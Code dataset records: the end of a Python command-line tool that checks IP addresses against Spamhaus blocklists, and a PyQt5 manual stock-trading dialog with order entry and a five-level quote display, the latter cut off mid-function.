'{address}', expecting {len(expected)} responses: \"\n + \" \".join(f\"'{resp}'\" for resp in expected)\n )\n\n responses = query.query(cfg, address)\n if not cfg.json:\n print(\n f\"...got {len(responses)} responses: \"\n + \" \".join(f\"'{resp}'\" for resp in responses)\n )\n\n if responses != expected:\n sys.exit(f\"Mismatch for '{address}'\")\n\n return responses\n\n\ndef cmd_test(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Describe the specified RBL return codes.\"\"\"\n return query.query(cfg, address)\n\n\ndef parse_arguments() -> Tuple[defs.Config, ConfigHandler]:\n \"\"\"Parse the command-line arguments.\"\"\"\n parser = argparse.ArgumentParser(prog=\"spahau\")\n parser.add_argument(\n \"--describe\",\n \"-D\",\n action=\"store_true\",\n help=\"describe the specified RBL return codes/addresses\",\n )\n parser.add_argument(\n \"--domain\",\n \"-d\",\n type=str,\n default=defs.RBL_DOMAIN,\n help=\"specify the RBL domain to test against\",\n )\n parser.add_argument(\n \"--hostname\",\n \"-H\",\n action=\"store_true\",\n help=\"only output the RBL hostnames, do not send queries\",\n )\n parser.add_argument(\n \"--json\", \"-j\", 
action=\"store_true\", help=\"display JSON output\"\n )\n parser.add_argument(\n \"--selftest\",\n \"-T\",\n action=\"store_true\",\n help=\"run a self test: try to obtain some expected responses\",\n )\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"verbose operation; display diagnostic output\",\n )\n parser.add_argument(\n \"addresses\",\n type=str,\n nargs=\"+\",\n help=\"the addresses to query or describe\",\n )\n\n args = parser.parse_args()\n\n key = (\n (\"D\" if args.describe else \"\")\n + (\"H\" if args.hostname else \"\")\n + (\"T\" if args.selftest else \"\")\n )\n if len(key) > 1:\n sys.exit(\"At most one of -D, -H, or -T may be specified\")\n handler = {\n \"D\": cmd_describe,\n \"H\": cmd_show_hostname,\n \"T\": cmd_selftest,\n \"\": cmd_test,\n }[key]\n\n return (\n defs.Config(\n addresses=[defs.IPAddress.parse(item) for item in args.addresses],\n domain=str(args.domain),\n json=bool(args.json),\n verbose=bool(args.verbose),\n ),\n handler,\n )\n\n\ndef main() -> None:\n \"\"\"Parse command-line arguments, do cri... err, things.\"\"\"\n cfg, func = parse_arguments()\n\n data: Dict[str, Any] = {}\n for address in cfg.addresses:\n value = func(cfg, address)\n cfg.diag(f\"{address}: got {value}\")\n if cfg.json:\n if not value or isinstance(value, str):\n data[address.text] = value\n elif isinstance(value, response.Response):\n data[address.text] = dataclasses.asdict(value)\n else:\n data[address.text] = [\n dataclasses.asdict(item) for item in value\n ]\n continue\n\n if isinstance(value, (str, response.Response)):\n print(value)\n continue\n\n assert isinstance(value, list)\n if not value:\n print(\n f\"The IP address: {address} is NOT found in \"\n f\"the Spamhaus blacklists.\"\n )\n continue\n\n assert all(isinstance(item, response.Response) for item in value)\n if value and value[0].tag == \"ERROR\":\n print(f\"Could not obtain a response for {address}: {value[0]}\")\n continue\n\n stringified = \" \".join(f\"'{resp}'\" for resp in value)\n print(\n f\"The IP address: {address} is found in the following \"\n f\"Spamhaus public IP zone: {stringified}\"\n )\n\n if cfg.json:\n print(json.dumps(data, indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ppentchev/python-spahau","sub_path":"python/src/spahau/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21526673196","text":"\nfrom PyQt5.QtGui import QColor, QFont, QPalette\nfrom PyQt5.QtCore import QEvent, Qt #QString\nfrom PyQt5.QtWidgets import QApplication, QComboBox, QDialog, QDoubleSpinBox, QLabel, QLineEdit, QMessageBox\nfrom PyQt5.QtWidgets import QPushButton, QRadioButton, QSpinBox, QTextEdit, QGridLayout, QHBoxLayout, QVBoxLayout\n\nimport define\nimport logger\nimport center\nimport trader\n\nclass Panel(QDialog):\n def __init__(self, **kwargs):\n super(Panel, self).__init__()\n self.strategy = kwargs.get(\"strategy\", \"\")\n self.version_info = \"V0.1.0-Beta Build 20180422\"\n self.log_text = \"\"\n self.log_cate = \"Panel_Trader_STK_APE\"\n self.logger = logger.Logger()\n \n self.InitUserInterface()\n \n self.symbol = \"\"\n self.exchange = \"\" # SH、SZ 或 SSE、SZE # 目前只订阅个股行情,不考虑沪深个股和指数代码重合问题\n self.trader = None # 策略中赋值\n self.subscribe = False # 行情订阅标志\n self.center = center.Center()\n \n self.quote_data = None\n self.price_round_stock = 2 # 小数位数\n self.price_round_index = 2 # 小数位数\n\n def OnWorking(self): # 
for concrete strategies to override; runs extra setup before the strategy starts working\n        if self.subscribe == False:\n            self.center.RegQuoteSub(self.strategy, self.OnQuoteStock, \"stock_ltp\") # only individual stocks are subscribed for now\n            self.subscribe = True\n        self.trader = trader.Trader().GetTrader(\"hbzq\")\n        if self.trader == None:\n            self.logger.SendMessage(\"E\", 4, self.log_cate, \"获取标识为 hbzq 的交易服务失败!\", \"M\")\n\n    def OnSuspend(self): # for concrete strategies to override; runs extra setup before the strategy is suspended\n        pass\n\n    def OnContinue(self): # for concrete strategies to override; runs extra setup before the strategy resumes\n        pass\n\n    def OnTerminal(self): # for concrete strategies to override; runs extra cleanup before the strategy stops\n        if self.subscribe == True:\n            self.center.DelQuoteSub(self.strategy, \"stock_ltp\")\n            self.subscribe = False\n\n    def event(self, event):\n        if event.type() == define.DEF_EVENT_TRADER_STK_APE_UPDATE_QUOTE:\n            if self.quote_data != None:\n                self.OnUpdateQuote(self.quote_data, self.price_round_stock)\n        return QDialog.event(self, event)\n\n    def OnTraderEvent(self, trader, ret_func, task_item): # trade module event notification; for concrete strategies to override\n        if ret_func == define.trade_placeorder_s_func:\n            self.log_text = \"%s:%s %d:%d\" % (self.strategy, trader, ret_func, task_item.order.order_id)\n            self.logger.SendMessage(\"H\", 2, self.log_cate, self.log_text, \"T\")\n\n    def OnQuoteStock(self, msg): # triggered by an incoming quote\n        try:\n            str_code = msg.data[0].decode()\n            if str_code == self.symbol:\n                if \"60\" == str_code[0:2] or \"000\" == str_code[0:3] or \"001\" == str_code[0:3] or \"002\" == str_code[0:3] or \"300\" == str_code[0:3]:\n                    self.quote_data = msg.data\n                    QApplication.postEvent(self, QEvent(define.DEF_EVENT_TRADER_STK_APE_UPDATE_QUOTE)) # postEvent is asynchronous, sendEvent is synchronous\n        except Exception as e:\n            self.log_text = \"%s:函数 OnQuoteStock 异常!%s\" % (self.strategy, e)\n            self.logger.SendMessage(\"E\", 4, self.log_cate, self.log_text, \"M\")\n\n    def InitUserInterface(self):\n        self.color_red = QPalette()\n        self.color_red.setColor(QPalette.WindowText, Qt.red)\n        self.color_green = QPalette()\n        self.color_green.setColor(QPalette.WindowText, QColor(0, 128, 0))\n        self.color_black = QPalette()\n        self.color_black.setColor(QPalette.WindowText, Qt.black)\n        \n        self.list_exchange = [define.DEF_EXCHANGE_STOCK_SH, define.DEF_EXCHANGE_STOCK_SZ]\n        self.list_entr_type = [define.DEF_PRICE_TYPE_STOCK_LIMIT, define.DEF_PRICE_TYPE_STOCK_MARKET]\n        \n        self.setWindowTitle(\"手动交易-股票-APE %s\" % self.version_info)\n        self.resize(380, 300)\n        self.setFont(QFont(\"SimSun\", 9))\n        \n        self.label_exchange = QLabel(\"交易市场\")\n        self.label_exchange.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_symbol = QLabel(\"证券代码\")\n        self.label_symbol.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_name = QLabel(\"证券名称\")\n        self.label_name.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_entr_type = QLabel(\"委托方式\")\n        self.label_entr_type.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_can_use = QLabel(\"可用金额\")\n        self.label_can_use.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_can_sell = QLabel(\"可用数量\")\n        self.label_can_sell.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_price = QLabel(\"委托价格\")\n        self.label_price.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_volume = QLabel(\"委托数量\")\n        self.label_volume.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        \n        self.label_can_use_unit = QLabel(\"元\")\n        self.label_can_use_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_can_sell_unit = QLabel(\"股\")\n        self.label_can_sell_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_price_unit = QLabel(\"元\")\n        self.label_price_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.label_volume_unit = QLabel(\"股\")\n        
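# Illustrative aside, not part of the original file: the quote path above is the usual Qt cross-thread pattern -- OnQuoteStock() runs on the market-data thread, stashes the payload in self.quote_data and posts a custom QEvent, and the overridden event() then calls OnUpdateQuote() on the GUI thread. A minimal sketch of the same pattern, where MyPanel, DEF_MY_EVENT, on_feed and refresh are hypothetical names:\n        #   DEF_MY_EVENT = QEvent.Type(QEvent.registerEventType())\n        #   class MyPanel(QDialog):\n        #       def on_feed(self, payload):  # called on the feed thread\n        #           self.payload = payload\n        #           QApplication.postEvent(self, QEvent(DEF_MY_EVENT))\n        #       def event(self, ev):  # runs on the GUI thread\n        #           if ev.type() == DEF_MY_EVENT:\n        #               self.refresh(self.payload)  # safe to touch widgets here\n        #           return QDialog.event(self, ev)\n        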
self.label_volume_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        \n        self.combo_exchange = QComboBox()\n        self.combo_exchange.addItems(self.list_exchange)\n        self.line_edit_symbol = QLineEdit(\"\")\n        self.line_edit_symbol.setStyleSheet(\"color:red\") # red initially\n        self.line_edit_symbol.setFont(QFont(\"SimSun\", 9))\n        self.line_edit_name = QLineEdit(\"\")\n        self.line_edit_name.setReadOnly(True)\n        self.line_edit_name.setFont(QFont(\"SimSun\", 9))\n        self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:red\") # red initially\n        self.line_edit_name.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.combo_entr_type = QComboBox()\n        self.combo_entr_type.addItems(self.list_entr_type)\n        self.line_edit_can_use = QLineEdit(\"0.00\")\n        self.line_edit_can_use.setReadOnly(True)\n        self.line_edit_can_use.setStyleSheet(\"background-color:rgb(240,240,240)\")\n        self.line_edit_can_use.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.line_edit_can_sell = QLineEdit(\"0\")\n        self.line_edit_can_sell.setReadOnly(True)\n        self.line_edit_can_sell.setStyleSheet(\"background-color:rgb(240,240,240)\")\n        self.line_edit_can_sell.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.spin_price = QDoubleSpinBox()\n        self.spin_price.setDecimals(4)\n        self.spin_price.setMinimum(0)\n        self.spin_price.setMaximum(100000)\n        self.spin_price.setStyleSheet(\"color:red\") # red initially\n        self.spin_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.spin_volume = QSpinBox()\n        self.spin_volume.setMinimum(0)\n        self.spin_volume.setMaximum(1000000)\n        self.spin_volume.setSingleStep(100)\n        self.spin_volume.setStyleSheet(\"color:red\") # red initially\n        self.spin_volume.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        \n        self.grid_layout_essential = QGridLayout()\n        self.grid_layout_essential.setContentsMargins(-1, -1, -1, -1)\n        self.grid_layout_essential.addWidget(self.label_exchange, 0, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_symbol, 1, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_name, 2, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_entr_type, 3, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_can_use, 4, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_can_sell, 5, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_price, 6, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_volume, 7, 0, 1, 1)\n        self.grid_layout_essential.addWidget(self.combo_exchange, 0, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.line_edit_symbol, 1, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.line_edit_name, 2, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.combo_entr_type, 3, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.line_edit_can_use, 4, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.line_edit_can_sell, 5, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.spin_price, 6, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.spin_volume, 7, 1, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_can_use_unit, 4, 2, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_can_sell_unit, 5, 2, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_price_unit, 6, 2, 1, 1)\n        self.grid_layout_essential.addWidget(self.label_volume_unit, 7, 2, 1, 1)\n        \n        self.radio_button_buy = QRadioButton(\"买 入\")\n        self.radio_button_buy.setStyleSheet(\"color:red\")\n        self.radio_button_buy.setFont(QFont(\"SimSun\", 9))\n        self.radio_button_buy.setChecked(True)\n        self.radio_button_buy.setFixedWidth(70)\n        self.radio_button_sell = QRadioButton(\"卖 出\")\n        
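# Illustrative aside (assumption, not in the original source): setSingleStep(100) above matches the 100-share A-share board lot; a strategy computing a raw share count would typically floor it to the lot before filling the spin box, e.g.:\n        #   raw_amount = 1234\n        #   lot = 100\n        #   amount = (raw_amount // lot) * lot  # -> 1200 shares\n        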
self.radio_button_sell.setStyleSheet(\"color:green\")\n        self.radio_button_sell.setFont(QFont(\"SimSun\", 9))\n        self.radio_button_sell.setFixedWidth(70)\n        self.button_place_order = QPushButton(\"下 单\")\n        self.button_place_order.setFont(QFont(\"SimSun\", 9))\n        self.button_place_order.setStyleSheet(\"font:bold;color:red\") # red initially\n        self.button_place_order.setFixedWidth(70)\n        \n        self.label_order_id = QLabel(\"撤单委托编号\")\n        self.label_order_id.setFixedWidth(70)\n        self.label_order_id.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n        self.line_edit_order_id = QLineEdit(\"\")\n        self.line_edit_order_id.setFixedWidth(70)\n        self.line_edit_order_id.setStyleSheet(\"color:blue\")\n        self.line_edit_order_id.setFont(QFont(\"SimSun\", 9))\n        self.button_cancel_order = QPushButton(\"撤 单\")\n        self.button_cancel_order.setFont(QFont(\"SimSun\", 9))\n        self.button_cancel_order.setStyleSheet(\"font:bold;color:blue\")\n        self.button_cancel_order.setFixedWidth(70)\n        \n        self.h_box_layout_order_buttons = QHBoxLayout()\n        self.h_box_layout_order_buttons.setContentsMargins(-1, -1, -1, -1)\n        self.h_box_layout_order_buttons.addStretch(1)\n        self.h_box_layout_order_buttons.addWidget(self.radio_button_buy)\n        self.h_box_layout_order_buttons.addStretch(1)\n        self.h_box_layout_order_buttons.addWidget(self.radio_button_sell)\n        self.h_box_layout_order_buttons.addStretch(1)\n        self.h_box_layout_order_buttons.addWidget(self.button_place_order)\n        self.h_box_layout_order_buttons.addStretch(1)\n        \n        self.h_box_layout_cancel_order = QHBoxLayout()\n        self.h_box_layout_cancel_order.setContentsMargins(-1, -1, -1, -1) #\n        self.h_box_layout_cancel_order.addStretch(1)\n        self.h_box_layout_cancel_order.addWidget(self.label_order_id)\n        self.h_box_layout_cancel_order.addStretch(1)\n        self.h_box_layout_cancel_order.addWidget(self.line_edit_order_id)\n        self.h_box_layout_cancel_order.addStretch(1)\n        self.h_box_layout_cancel_order.addWidget(self.button_cancel_order)\n        self.h_box_layout_cancel_order.addStretch(1)\n        \n        self.v_box_layout_order = QVBoxLayout()\n        self.v_box_layout_order.setContentsMargins(-1, -1, -1, -1)\n        self.v_box_layout_order.addLayout(self.grid_layout_essential)\n        self.v_box_layout_order.addLayout(self.h_box_layout_order_buttons)\n        self.v_box_layout_order.addLayout(self.h_box_layout_cancel_order)\n        \n        self.label_high_limit = QLabel(\"涨停\")\n        self.label_ask_5 = QLabel(\"卖五\")\n        self.label_ask_4 = QLabel(\"卖四\")\n        self.label_ask_3 = QLabel(\"卖三\")\n        self.label_ask_2 = QLabel(\"卖二\")\n        self.label_ask_1 = QLabel(\"卖一\")\n        self.label_last = QLabel(\"最新\")\n        self.label_last.setMinimumWidth(35)\n        self.label_bid_1 = QLabel(\"买一\")\n        self.label_bid_2 = QLabel(\"买二\")\n        self.label_bid_3 = QLabel(\"买三\")\n        self.label_bid_4 = QLabel(\"买四\")\n        self.label_bid_5 = QLabel(\"买五\")\n        self.label_low_limit = QLabel(\"跌停\")\n        \n        self.label_high_limit.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_ask_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_ask_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_ask_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_ask_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_ask_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_last.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_bid_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_bid_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_bid_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        self.label_bid_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n        
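# Descriptive note: the addStretch(1) calls above give every gap in the two button rows an equal stretch factor, so the buy/sell radio buttons and the place/cancel controls stay evenly spaced when the dialog is resized.\n        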
self.label_bid_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_low_limit.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n \n self.label_high_limit_price = QLabel(\"0.00\")\n self.label_high_limit_price.setMinimumWidth(60)\n self.label_ask_price_5 = QLabel(\"0.00\")\n self.label_ask_price_4 = QLabel(\"0.00\")\n self.label_ask_price_3 = QLabel(\"0.00\")\n self.label_ask_price_2 = QLabel(\"0.00\")\n self.label_ask_price_1 = QLabel(\"0.00\")\n self.label_ask_volume_5 = QLabel(\"0\")\n self.label_ask_volume_4 = QLabel(\"0\")\n self.label_ask_volume_3 = QLabel(\"0\")\n self.label_ask_volume_2 = QLabel(\"0\")\n self.label_ask_volume_1 = QLabel(\"0\")\n self.label_last_price = QLabel(\"0.00\")\n self.label_last_price.setMinimumWidth(60)\n self.label_last_up_down = QLabel(\"0.00%\")\n self.label_last_up_down.setMinimumWidth(60)\n self.label_bid_price_1 = QLabel(\"0.00\")\n self.label_bid_price_2 = QLabel(\"0.00\")\n self.label_bid_price_3 = QLabel(\"0.00\")\n self.label_bid_price_4 = QLabel(\"0.00\")\n self.label_bid_price_5 = QLabel(\"0.00\")\n self.label_bid_volume_1 = QLabel(\"0\")\n self.label_bid_volume_2 = QLabel(\"0\")\n self.label_bid_volume_3 = QLabel(\"0\")\n self.label_bid_volume_4 = QLabel(\"0\")\n self.label_bid_volume_5 = QLabel(\"0\")\n self.label_low_limit_price = QLabel(\"0.00\")\n self.label_low_limit_price.setMinimumWidth(60)\n \n self.label_high_limit_price.setPalette(self.color_red)\n self.label_ask_price_5.setPalette(self.color_green)\n self.label_ask_price_4.setPalette(self.color_green)\n self.label_ask_price_3.setPalette(self.color_green)\n self.label_ask_price_2.setPalette(self.color_green)\n self.label_ask_price_1.setPalette(self.color_green)\n self.label_ask_volume_5.setPalette(self.color_green)\n self.label_ask_volume_4.setPalette(self.color_green)\n self.label_ask_volume_3.setPalette(self.color_green)\n self.label_ask_volume_2.setPalette(self.color_green)\n self.label_ask_volume_1.setPalette(self.color_green)\n self.label_last_price.setPalette(self.color_black)\n self.label_last_up_down.setPalette(self.color_black)\n self.label_bid_price_1.setPalette(self.color_red)\n self.label_bid_price_2.setPalette(self.color_red)\n self.label_bid_price_3.setPalette(self.color_red)\n self.label_bid_price_4.setPalette(self.color_red)\n self.label_bid_price_5.setPalette(self.color_red)\n self.label_bid_volume_1.setPalette(self.color_red)\n self.label_bid_volume_2.setPalette(self.color_red)\n self.label_bid_volume_3.setPalette(self.color_red)\n self.label_bid_volume_4.setPalette(self.color_red)\n self.label_bid_volume_5.setPalette(self.color_red)\n self.label_low_limit_price.setPalette(self.color_green)\n \n self.label_high_limit_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_price_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_ask_volume_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_last_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n 
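# Illustrative aside: label_last_up_down is filled in OnUpdateQuote() as (last / prev_close) - 1. A worked example with made-up numbers: prev_close = 10.00, last = 10.25 -> 10.25 / 10.00 - 1 = 0.025, shown as \"2.50%\" in red, following the mainland-market convention of red for gains and green for losses.\n        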
self.label_last_up_down.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_price_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_1.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_2.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_3.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_4.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_bid_volume_5.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.label_low_limit_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n \n self.grid_layout_quote = QGridLayout()\n self.grid_layout_quote.addWidget(self.label_high_limit, 0, 0) #\n self.grid_layout_quote.addWidget(self.label_ask_5, 1, 0)\n self.grid_layout_quote.addWidget(self.label_ask_4, 2, 0)\n self.grid_layout_quote.addWidget(self.label_ask_3, 3, 0)\n self.grid_layout_quote.addWidget(self.label_ask_2, 4, 0)\n self.grid_layout_quote.addWidget(self.label_ask_1, 5, 0)\n self.grid_layout_quote.addWidget(self.label_last, 6, 0) #\n self.grid_layout_quote.addWidget(self.label_bid_1, 7, 0)\n self.grid_layout_quote.addWidget(self.label_bid_2, 8, 0)\n self.grid_layout_quote.addWidget(self.label_bid_3, 9, 0)\n self.grid_layout_quote.addWidget(self.label_bid_4, 10, 0)\n self.grid_layout_quote.addWidget(self.label_bid_5, 11, 0)\n self.grid_layout_quote.addWidget(self.label_low_limit, 12, 0) #\n self.grid_layout_quote.addWidget(self.label_high_limit_price, 0, 1) #\n self.grid_layout_quote.addWidget(self.label_ask_price_5, 1, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_4, 2, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_3, 3, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_2, 4, 1)\n self.grid_layout_quote.addWidget(self.label_ask_price_1, 5, 1)\n self.grid_layout_quote.addWidget(self.label_last_price, 6, 1) #\n self.grid_layout_quote.addWidget(self.label_bid_price_1, 7, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_2, 8, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_3, 9, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_4, 10, 1)\n self.grid_layout_quote.addWidget(self.label_bid_price_5, 11, 1)\n self.grid_layout_quote.addWidget(self.label_low_limit_price, 12, 1) #\n self.grid_layout_quote.addWidget(self.label_ask_volume_5, 1, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_4, 2, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_3, 3, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_2, 4, 2)\n self.grid_layout_quote.addWidget(self.label_ask_volume_1, 5, 2)\n self.grid_layout_quote.addWidget(self.label_last_up_down, 6, 2) #\n self.grid_layout_quote.addWidget(self.label_bid_volume_1, 7, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_2, 8, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_3, 9, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_4, 10, 2)\n self.grid_layout_quote.addWidget(self.label_bid_volume_5, 11, 2)\n \n self.main_text_edit_bottom = QTextEdit(self)\n self.main_text_edit_bottom.setText(\"\")\n self.main_text_edit_bottom.setFont(QFont(\"SimSun\", 9))\n \n self.h_box_layout_1 = QHBoxLayout()\n self.h_box_layout_1.addLayout(self.v_box_layout_order)\n 
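# Descriptive note: grid_layout_quote above lays the price ladder out top-down -- row 0 limit-up, rows 1-5 asks 5..1, row 6 the last price and change, rows 7-11 bids 1..5, row 12 limit-down -- with captions in column 0, prices in column 1 and volumes in column 2.\n        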
self.h_box_layout_1.addLayout(self.grid_layout_quote)\n \n self.h_box_layout_2 = QHBoxLayout()\n self.h_box_layout_2.setContentsMargins(-1, -1, -1, -1)\n self.h_box_layout_2.addWidget(self.main_text_edit_bottom)\n \n self.v_box_layout_mian = QVBoxLayout()\n self.v_box_layout_mian.setContentsMargins(-1, -1, -1, -1)\n self.v_box_layout_mian.addLayout(self.h_box_layout_1)\n self.v_box_layout_mian.addLayout(self.h_box_layout_2)\n \n self.setLayout(self.v_box_layout_mian)\n \n self.combo_exchange.activated[str].connect(self.OnChangeExchange)\n self.line_edit_symbol.editingFinished.connect(self.OnChangeSymbol)\n self.radio_button_buy.clicked.connect(self.OnChangeBuySell)\n self.radio_button_sell.clicked.connect(self.OnChangeBuySell)\n self.button_place_order.clicked.connect(self.OnButtonPlaceOrder)\n self.button_cancel_order.clicked.connect(self.OnButtonCancelOrder)\n\n def OnChangeExchange(self, str_exchange):\n self.symbol = \"\"\n self.exchange = \"\"\n self.line_edit_symbol.setText(\"\")\n self.line_edit_name.setText(\"\")\n self.OnChangeSymbol()\n\n def OnChangeSymbol(self):\n self.exchange = \"\"\n self.symbol = self.line_edit_symbol.text() #str(unicode(self.line_edit_symbol.text(), \"gb2312\"))\n \n self.spin_price.setValue(0)\n self.spin_volume.setValue(0)\n \n self.label_high_limit_price.setText(\"0.00\")\n self.label_ask_price_5.setText(\"0.00\")\n self.label_ask_price_4.setText(\"0.00\")\n self.label_ask_price_3.setText(\"0.00\")\n self.label_ask_price_2.setText(\"0.00\")\n self.label_ask_price_1.setText(\"0.00\")\n self.label_ask_volume_5.setText(\"0\")\n self.label_ask_volume_4.setText(\"0\")\n self.label_ask_volume_3.setText(\"0\")\n self.label_ask_volume_2.setText(\"0\")\n self.label_ask_volume_1.setText(\"0\")\n self.label_last_price.setText(\"0.00\")\n self.label_last_up_down.setText(\"0.00%\")\n self.label_bid_price_1.setText(\"0.00\")\n self.label_bid_price_2.setText(\"0.00\")\n self.label_bid_price_3.setText(\"0.00\")\n self.label_bid_price_4.setText(\"0.00\")\n self.label_bid_price_5.setText(\"0.00\")\n self.label_bid_volume_1.setText(\"0\")\n self.label_bid_volume_2.setText(\"0\")\n self.label_bid_volume_3.setText(\"0\")\n self.label_bid_volume_4.setText(\"0\")\n self.label_bid_volume_5.setText(\"0\")\n self.label_low_limit_price.setText(\"0.00\")\n\n def OnChangeBuySell(self):\n if self.radio_button_buy.isChecked():\n self.line_edit_symbol.setStyleSheet(\"color:red\")\n self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:red\")\n self.spin_price.setStyleSheet(\"color:red\")\n self.spin_volume.setStyleSheet(\"color:red\")\n self.button_place_order.setStyleSheet(\"font:bold;color:red\")\n if self.radio_button_sell.isChecked():\n self.line_edit_symbol.setStyleSheet(\"color:green\")\n self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:green\")\n self.spin_price.setStyleSheet(\"color:green\")\n self.spin_volume.setStyleSheet(\"color:green\")\n self.button_place_order.setStyleSheet(\"font:bold;color:green\")\n\n def OnUpdateQuote(self, data, price_round):\n try:\n self.exchange = data[3].decode() # 证券市场\n self.line_edit_name.setText(str(data[1].decode(\"gbk\"))) # 证券名称 #QString.fromLocal8Bit(data[1].decode(\"gbk\")) # 含中文\n self.label_ask_price_5.setText(str(round(data[13][4], price_round)))\n self.label_ask_price_4.setText(str(round(data[13][3], price_round)))\n self.label_ask_price_3.setText(str(round(data[13][2], price_round)))\n self.label_ask_price_2.setText(str(round(data[13][1], price_round)))\n 
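# Descriptive note, inferred from the surrounding calls: the quote payload is indexed as data[1] name (GBK bytes), data[3] exchange, data[5] last price, data[10] previous close, data[13]/data[14] ask prices/volumes (5 levels), data[15]/data[16] bid prices/volumes, data[17] limit-up and data[18] limit-down.\n            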
